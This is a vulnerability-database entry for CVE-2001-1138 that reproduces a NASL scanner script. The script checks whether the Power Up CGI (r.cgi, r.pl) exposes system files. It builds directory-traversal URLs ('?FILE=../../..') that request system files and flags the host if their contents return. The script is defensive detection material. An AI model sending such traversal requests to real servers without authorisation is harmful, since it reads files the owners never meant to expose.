| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-2001-1138 | 15 Mar 200205:00 | – | cve | |
| CVE-2001-1138 | 15 Mar 200205:00 | – | cvelist | |
| EUVD-2001-1119 | 7 Oct 202500:30 | – | euvd | |
| CVE-2001-1138 | 7 Sep 200104:00 | – | nvd |
| Source | Link |
|---|---|
| securiteam | www.securiteam.com/unixfocus/5PP062K5FO.html |
| securityfocus | www.securityfocus.com/bid/3304 |
# SPDX-FileCopyrightText: 2001 Noam Rathaus
# SPDX-FileCopyrightText: 2001 SecuriTeam
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10776");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_cve_id("CVE-2001-1138");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Power Up Information Disclosure");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2001 SecuriTeam & Copyright (C) 2001 Noam Rathaus");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "os_detection.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"http://www.securiteam.com/unixfocus/5PP062K5FO.html");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3304");
script_tag(name:"solution", value:"Disable access to the CGI until the author releases a patch.");
script_tag(name:"summary", value:"The remote server is using the Power Up CGI.
This CGI exposes critical system information, and allows remote attackers
to read any world readable file.");
script_tag(name:"solution_type", value:"Mitigation");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
port = http_get_port( default:80 );
files = traversal_files();
foreach dir( make_list_unique( "/", "/cgi-bin/powerup", "/cgi_bin/powerup", http_cgi_dirs( port:port ) ) ) {
if( dir == "/" ) dir = "";
foreach url( make_list( dir + "/r.cgi",
dir + "/r.pl" ) ) {
foreach file( keys( files ) ) {
url = string( url, "?FILE=../../../../../../../../../../", files[file] );
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation